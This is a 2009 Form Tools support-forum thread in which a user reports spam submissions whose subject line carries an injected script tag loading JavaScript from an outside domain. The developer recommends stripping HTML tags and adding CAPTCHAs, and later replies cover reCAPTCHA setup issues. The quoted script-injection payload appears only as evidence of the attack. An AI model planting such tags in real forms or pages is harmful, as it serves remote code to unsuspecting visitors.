The following warnings occurred: | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Warning [2] Undefined array key "avatartype" - Line: 783 - File: global.php PHP 8.1.31 (Linux)
|
![]() |
Form tools hacked - Printable Version +- Form Tools (https://forums.formtools.org) +-- Forum: Modules / Other (https://forums.formtools.org/forumdisplay.php?fid=8) +--- Forum: Modules (https://forums.formtools.org/forumdisplay.php?fid=16) +--- Thread: Form tools hacked (/showthread.php?tid=368) |
Form tools hacked - sujith - Nov 14th, 2009 My form tools is hacked. Now on every message, i am getting the following as subject. All my forms are affected. Please help Form Submission through Website<script src=http://nacionalnipark-izletistemurici.com/stats/index.php ></script> RE: Form tools hacked - Ben - Nov 14th, 2009 Hi Sujith, I'm very sorry to hear this. So what exactly is happening? You're getting a lot of form submissions with that content as the subject heading? In that case, you're just being spammed - sadly, For security measures, the first thing you should do is re-enable the "strip tags in form submissions" setting on your Edit Form -> main tab. By default, that value is set to "yes" and will strip out all HTML tags, like the <script> tag mentioned in your post. The drawback is that you won't be able to get any HTML content submitted via your forms - so no WYSIWYG fields. Secondly, you'll need to look into adding some spam prevention to your forms. Here are a couple: http://docs.formtools.org/tutorials/post_form_captchas/ http://modules.formtools.org/submission_pre_parser/?page=spam_detection_example Again, sorry to hear about this - it's happened to me, and I know what a pain it can be! - Ben RE: Form tools hacked - sujith - Nov 18th, 2009 Ben, thanks for your support. I am using html pages for form submission. but the tutorial states for php pages. could you please help me to implement re-captcha in an html form? RE: Form tools hacked - uaenoob - Nov 23rd, 2009 hey well you have to learn lil bit of php .. but for now .. this might help you http://www.yellowpipe.com/yis/tools/HTML_converter/ convert your HTML to PHP RE: Form tools hacked - sujith - Nov 23rd, 2009 That was a nice tool. Anyway i changed my forms to php as well and added a form through api. I succesfully completed the steps. But 1 issue is nagging me. 1. I have 2 text areas in the form. If the captcha is entered incorrect, the form returns without the data filled. But if i refresh the form, i will get the data filled except the two text areas. 2. Can i use the error alert with the rsv alert, in case of an incorrect captcha? 3. The text areas won't validate after inserting the captcha. My form is here. Please check this and help http://www.kerala360.net/kerala-medical-travel.php |